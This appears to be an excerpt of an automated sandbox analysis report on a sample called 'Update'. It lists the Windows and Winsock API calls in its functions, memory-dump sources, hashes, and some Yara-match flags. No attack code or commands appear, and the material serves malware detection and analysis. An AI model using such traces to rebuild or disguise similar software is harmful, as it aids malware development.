                                                                                                • Opcode Fuzzy Hash: f834a32b78aad868db6c3b299e2b280971fbcefdd6bd4d0406109023f8606c47
                                                                                                • Instruction Fuzzy Hash: 592173B6640704ABD220EF79DC85B97B3E8FF89751F104A1EF58AC7654DA71F8008BA4
                                                                                                APIs
                                                                                                • SetLastError.KERNEL32(0000139F,?), ref: 037F4E99
                                                                                                • TryEnterCriticalSection.KERNEL32(?,?), ref: 037F4EB8
                                                                                                • TryEnterCriticalSection.KERNEL32(?), ref: 037F4EC2
                                                                                                • SetLastError.KERNEL32(0000139F), ref: 037F4ED9
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 037F4EE2
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 037F4EE9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                • String ID:
                                                                                                • API String ID: 4082018349-0
                                                                                                • Opcode ID: 40f3bfd3e957b147be0dbd60015c1d677a4896d8ff8efe09b900a7a34476617b
                                                                                                • Instruction ID: fa4df203a816f2fdc26f5dfd1b9238ed3ef93514b03dbc4a1b6f9845392551f4
                                                                                                • Opcode Fuzzy Hash: 40f3bfd3e957b147be0dbd60015c1d677a4896d8ff8efe09b900a7a34476617b
                                                                                                • Instruction Fuzzy Hash: 6A1186327007058FD320EA7EEC8497BF3ECFB88325B04096EE615C2640D671E914C7A5
                                                                                                APIs
                                                                                                • SetLastError.KERNEL32(0000139F,?), ref: 10004E79
                                                                                                • TryEnterCriticalSection.KERNEL32(?,?), ref: 10004E98
                                                                                                • TryEnterCriticalSection.KERNEL32(?), ref: 10004EA2
                                                                                                • SetLastError.KERNEL32(0000139F), ref: 10004EB9
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 10004EC2
                                                                                                • LeaveCriticalSection.KERNEL32(00000002), ref: 10004EC9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                • String ID:
                                                                                                • API String ID: 4082018349-0
                                                                                                • Opcode ID: 6720494b42b4f7a77260b90f8de04f87c6be7c2df52100a175db74c353f41269
                                                                                                • Instruction ID: b6eaa0d5c2d22c0db505b760e803bdb0fa2ef48d94b0f961ed90457994499652
                                                                                                • Opcode Fuzzy Hash: 6720494b42b4f7a77260b90f8de04f87c6be7c2df52100a175db74c353f41269
                                                                                                • Instruction Fuzzy Hash: 36118272700354DBE320DBB9DC85A6BB3ECFB88392B41063EE645C7550DA72E804CBA5
                                                                                                APIs
                                                                                                • SetLastError.KERNEL32(0000007F), ref: 037FDD32
                                                                                                • SetLastError.KERNEL32(0000007F), ref: 037FDE35
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast
                                                                                                • String ID: Main
                                                                                                • API String ID: 1452528299-521822810
                                                                                                • Opcode ID: b7165a18a4b4ab0da077cd41ae3842cbb4602b710658c246eb04321c26266913
                                                                                                • Instruction ID: d325d73f5ac4ac2ba1c764ed1edcd30d7cd40f68a38efc4735470810b1288581
                                                                                                • Opcode Fuzzy Hash: b7165a18a4b4ab0da077cd41ae3842cbb4602b710658c246eb04321c26266913
                                                                                                • Instruction Fuzzy Hash: 0541BF72A00209DFD720DF68D881B6AF3E8FF94314F0846AADA459B355E775E941CB90
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 6CA9CB70
                                                                                                • __alloca_probe_16.LIBCMT ref: 6CA9CB9C
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 6CA9CBDB
                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6CA9CBF8
                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 6CA9CC37
                                                                                                • __alloca_probe_16.LIBCMT ref: 6CA9CC54
                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 6CA9CC96
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6CA9CCB9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                • String ID:
                                                                                                • API String ID: 2040435927-0
                                                                                                • Opcode ID: 70691c5b004c4241bac5b2ee9f7252c06d6a62805fbdb29675e6bffc85b733d1
                                                                                                • Instruction ID: 67b333cb077b2d6906cab8053f99aa2b1b64d96d0044ac42bd4ac8d1a9cc838d
                                                                                                • Opcode Fuzzy Hash: 70691c5b004c4241bac5b2ee9f7252c06d6a62805fbdb29675e6bffc85b733d1
                                                                                                • Instruction Fuzzy Hash: 2651E172621A16AFEF106FA8CC46FAA3FF8EF0575CF244424F910D6690D730D9958B50
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 037F3F65
                                                                                                • SetLastError.KERNEL32(0000139F,?,74DEDFA0,037F3648), ref: 037F4054
                                                                                                  • Part of subcall function 037F2BC0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 037F2BD6
                                                                                                  • Part of subcall function 037F2BC0: SwitchToThread.KERNEL32 ref: 037F2BEA
                                                                                                • send.WS2_32(?,038149C0,00000010,00000000), ref: 037F3FC6
                                                                                                • SetEvent.KERNEL32(?), ref: 037F3FE9
                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 037F3FF5
                                                                                                • WSACloseEvent.WS2_32(?), ref: 037F4003
                                                                                                • shutdown.WS2_32(?,00000001), ref: 037F401B
                                                                                                • closesocket.WS2_32(?), ref: 037F4025
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                • String ID:
                                                                                                • API String ID: 3254528666-0
                                                                                                • Opcode ID: c69263aa08b8aaf395d2cab07adfbb0af156de501ad604f3f4185b7cb175b6c8
                                                                                                • Instruction ID: c971acc5e55116a4b82c1c410fd68d6fbdfe174c62612cf2026403a10712db9a
                                                                                                • Opcode Fuzzy Hash: c69263aa08b8aaf395d2cab07adfbb0af156de501ad604f3f4185b7cb175b6c8
                                                                                                • Instruction Fuzzy Hash: C4211575200B049FE330EB69D888B5BB7F9BB84710F180E5CE6928BB90C7B9E445CB50
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 10003F65
                                                                                                • SetLastError.KERNEL32(0000139F,?,74DEDFA0,10003648), ref: 10004054
                                                                                                  • Part of subcall function 10002B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 10002B96
                                                                                                  • Part of subcall function 10002B80: SwitchToThread.KERNEL32 ref: 10002BAA
                                                                                                • send.WS2_32(?,10017440,00000010,00000000), ref: 10003FC6
                                                                                                • SetEvent.KERNEL32(?), ref: 10003FE9
                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 10003FF5
                                                                                                • WSACloseEvent.WS2_32(?), ref: 10004003
                                                                                                • shutdown.WS2_32(?,00000001), ref: 1000401B
                                                                                                • closesocket.WS2_32(?), ref: 10004025
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                • String ID:
                                                                                                • API String ID: 3254528666-0
                                                                                                • Opcode ID: 5b0e511d635cae701d0a261cd8daf94e2af27413da8a227727d1db7110453b86
                                                                                                • Instruction ID: f90f9a9b3ecf0f3d74d2563f24973b51980f03fc9dc1a8ff13de2f0f8c7e6f1d
                                                                                                • Opcode Fuzzy Hash: 5b0e511d635cae701d0a261cd8daf94e2af27413da8a227727d1db7110453b86
                                                                                                • Instruction Fuzzy Hash: 822148B56007109BE321DF64C888B9BB7F9FB44791F04891DF6869B690CBB6F845CB50
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F4074
                                                                                                • ResetEvent.KERNEL32(?,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F4087
                                                                                                • ResetEvent.KERNEL32(?,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F4090
                                                                                                • ResetEvent.KERNEL32(?,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F4099
                                                                                                  • Part of subcall function 037F1350: HeapFree.KERNEL32(?,00000000,?,?,?,037F40A6,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F1390
                                                                                                  • Part of subcall function 037F1420: HeapFree.KERNEL32(?,00000000,?,?,?,037F40B1,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F143D
                                                                                                  • Part of subcall function 037F1420: _free.LIBCMT ref: 037F1459
                                                                                                • HeapDestroy.KERNEL32(?,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F40B9
                                                                                                • HeapCreate.KERNEL32(?,?,?,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F40D4
                                                                                                • SetEvent.KERNEL32(?,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F4150
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F4157
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                • String ID:
                                                                                                • API String ID: 1219087420-0
                                                                                                • Opcode ID: 1dc34d1fbf655d8907aeca83a4c4428c4850635b079a74d982e27f0e75b3b850
                                                                                                • Instruction ID: c1e11b1a7e2780f153841dc1eaa1f060ff5f54429659a02b64453ae91a0acf95
                                                                                                • Opcode Fuzzy Hash: 1dc34d1fbf655d8907aeca83a4c4428c4850635b079a74d982e27f0e75b3b850
                                                                                                • Instruction Fuzzy Hash: 49311474200A06EFD705EB79D898BAAF7A8FF48310F148699E529CB250DB35A951CF90
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004074
                                                                                                • ResetEvent.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004087
                                                                                                • ResetEvent.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004090
                                                                                                • ResetEvent.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004099
                                                                                                  • Part of subcall function 10001350: HeapFree.KERNEL32(?,00000000,?,?,?,100040A6,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10001390
                                                                                                  • Part of subcall function 10001420: HeapFree.KERNEL32(?,00000000,?,?,?,100040B1,?,00000000,10004039,?,74DEDFA0,10003648), ref: 1000143D
                                                                                                  • Part of subcall function 10001420: _free.LIBCMT ref: 10001459
                                                                                                • HeapDestroy.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 100040B9
                                                                                                • HeapCreate.KERNEL32(?,?,?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 100040D4
                                                                                                • SetEvent.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004150
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004157
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                • String ID:
                                                                                                • API String ID: 1219087420-0
                                                                                                • Opcode ID: a47338e344b9415d0666abf4aacaa3da54f4cea86e3874ea6b078b9e747c069c
                                                                                                • Instruction ID: 23a0d0040592214b09f8a584f6cc232509badf453808b3f4ba03db8ba96dcbd9
                                                                                                • Opcode Fuzzy Hash: a47338e344b9415d0666abf4aacaa3da54f4cea86e3874ea6b078b9e747c069c
                                                                                                • Instruction Fuzzy Hash: 043143B0200A02EFE705CB64C898B96F7A8FF48351F058249E4298B264CB35F951CFD0
                                                                                                APIs
                                                                                                • _set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000002), ref: 006E101E
                                                                                                • _set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000002), ref: 006E1029
                                                                                                • __p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000002), ref: 006E1035
                                                                                                • __RTC_Initialize.LIBCMT ref: 006E104D
                                                                                                • _configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,006E17FA), ref: 006E1062
                                                                                                  • Part of subcall function 006E155C: InitializeSListHead.KERNEL32(006E30C0,006E1072), ref: 006E1561
                                                                                                • __setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_0000154F), ref: 006E1080
                                                                                                • _configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 006E109B
                                                                                                • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 006E10AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3509326012.00000000006E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006E0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3509290719.00000000006E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509400316.00000000006E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509430070.00000000006E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509430070.0000000000726000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e0000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
                                                                                                • String ID:
                                                                                                • API String ID: 1933938900-0
                                                                                                • Opcode ID: a023b793de75fa44077c9eb30c2e4e18c434a60f86a688a2090c3d984225cfe3
                                                                                                • Instruction ID: bf6ca902cfcfff57102858be2d06cf79806b6f83c0e9d4aba8a952ff0214d097
                                                                                                • Opcode Fuzzy Hash: a023b793de75fa44077c9eb30c2e4e18c434a60f86a688a2090c3d984225cfe3
                                                                                                • Instruction Fuzzy Hash: 330146F0A433C111D8D033FB0803A9E025B0E83B91B50091DB4129E187ED79848174BF
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strrchr
                                                                                                • String ID:
                                                                                                • API String ID: 3213747228-0
                                                                                                • Opcode ID: a85807fc997ee618783a6036bf783e221dda6a75a837a72a657676350f801317
                                                                                                • Instruction ID: 191e5109b1b9e247b9187843080cb57d5986bee1e6fb420a4cbb933d1af5aa18
                                                                                                • Opcode Fuzzy Hash: a85807fc997ee618783a6036bf783e221dda6a75a837a72a657676350f801317
                                                                                                • Instruction Fuzzy Hash: 9EB16672A01255AFEB118FA8CC81BEE7FB5EF56314F184155E800AB781E374D9A6C7E0
                                                                                                APIs
                                                                                                  • Part of subcall function 037F1610: __vswprintf.LIBCMT ref: 037F1646
                                                                                                • _malloc.LIBCMT ref: 037F2330
                                                                                                  • Part of subcall function 037FF673: __FF_MSGBANNER.LIBCMT ref: 037FF68C
                                                                                                  • Part of subcall function 037FF673: __NMSG_WRITE.LIBCMT ref: 037FF693
                                                                                                  • Part of subcall function 037FF673: RtlAllocateHeap.NTDLL(00000000,00000001,74DEDFF0,00000000,00000000,?,03804500,?,74DEDFF0,00000000,?,038081D6,00000000,?,?,?), ref: 037FF6B8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap__vswprintf_malloc
                                                                                                • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                • API String ID: 3723585974-868042568
                                                                                                • Opcode ID: 4169481eab2b34f6c68927620822025b4adc34d7cb863b6fb7f803ab0af3f0f7
                                                                                                • Instruction ID: 0c18f4e3ab14a777ef551ba48771cfe98694af6e97c010782e4509919747542a
                                                                                                • Opcode Fuzzy Hash: 4169481eab2b34f6c68927620822025b4adc34d7cb863b6fb7f803ab0af3f0f7
                                                                                                • Instruction Fuzzy Hash: 49B19279A002098FCF18DF68D8846AAB7B5BF48310F1949AEDE199F347DB71D941CB90
                                                                                                APIs
                                                                                                  • Part of subcall function 10001610: __vswprintf.LIBCMT ref: 10001646
                                                                                                • _malloc.LIBCMT ref: 10002330
                                                                                                  • Part of subcall function 10006E83: __FF_MSGBANNER.LIBCMT ref: 10006E9C
                                                                                                  • Part of subcall function 10006E83: __NMSG_WRITE.LIBCMT ref: 10006EA3
                                                                                                  • Part of subcall function 10006E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006EC8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap__vswprintf_malloc
                                                                                                • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                • API String ID: 3723585974-868042568
                                                                                                • Opcode ID: 5cf1fff9a3ed07831e4285ee8707500ca474442d0b2f18c7a61f986e26f0da37
                                                                                                • Instruction ID: eab6198d38b35a21c7eee27abceaedf30942dd101684ecb5fd47972168577aa1
                                                                                                • Opcode Fuzzy Hash: 5cf1fff9a3ed07831e4285ee8707500ca474442d0b2f18c7a61f986e26f0da37
                                                                                                • Instruction Fuzzy Hash: A4B19075A002059BEB08CF68D8806AE7BE5FF44390F1546AEED499B34ADB31ED45CB90
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 037F1878
                                                                                                • _free.LIBCMT ref: 037F18B6
                                                                                                • _free.LIBCMT ref: 037F18F5
                                                                                                • _free.LIBCMT ref: 037F1935
                                                                                                • _free.LIBCMT ref: 037F195D
                                                                                                • _free.LIBCMT ref: 037F1981
                                                                                                • _free.LIBCMT ref: 037F19B9
                                                                                                  • Part of subcall function 037FF639: RtlFreeHeap.NTDLL(00000000,00000000,?,03803E4C,00000000,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D), ref: 037FF64F
                                                                                                  • Part of subcall function 037FF639: GetLastError.KERNEL32(00000000,?,03803E4C,00000000,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D,03816340), ref: 037FF661
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: c09c2663c229486e0deeca5c2d06111e3147180d558eeb8f2e69ddee0aa8faac
                                                                                                • Instruction ID: 1729c05c84e5268bc4ff00e2eb9d3d23044d5560fc5f2eeb74a60d09021ebc15
                                                                                                • Opcode Fuzzy Hash: c09c2663c229486e0deeca5c2d06111e3147180d558eeb8f2e69ddee0aa8faac
                                                                                                • Instruction Fuzzy Hash: 9E5150B6A00211CFC714DF58C584965BBB6FF99224B6980ADC60A5F321C732BD42DFD1
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 10001878
                                                                                                • _free.LIBCMT ref: 100018B6
                                                                                                • _free.LIBCMT ref: 100018F5
                                                                                                • _free.LIBCMT ref: 10001935
                                                                                                • _free.LIBCMT ref: 1000195D
                                                                                                • _free.LIBCMT ref: 10001981
                                                                                                • _free.LIBCMT ref: 100019B9
                                                                                                  • Part of subcall function 10006E49: HeapFree.KERNEL32(00000000,00000000,?,10009900,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006E5F
                                                                                                  • Part of subcall function 10006E49: GetLastError.KERNEL32(00000000,?,10009900,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000), ref: 10006E71
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 6beac5a88b0ea45cad91d564d56e12dc9c07d13e28084cda825bb388b8fc93ec
                                                                                                • Instruction ID: a8bd5bf31f2101c09de15a5e31c6c05fc03f2a154fed00425f0cdbd26510a762
                                                                                                • Opcode Fuzzy Hash: 6beac5a88b0ea45cad91d564d56e12dc9c07d13e28084cda825bb388b8fc93ec
                                                                                                • Instruction Fuzzy Hash: 9C511C76A00211CFE704DF58C5D4899BBE6FF89294726C0ADD5096B326CB32BD42CB91
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 037F3883
                                                                                                • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 037F38C4
                                                                                                • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 037F3931
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 037F395C
                                                                                                • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 037F39F4
                                                                                                • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 037F3A22
                                                                                                • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 037F3A39
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
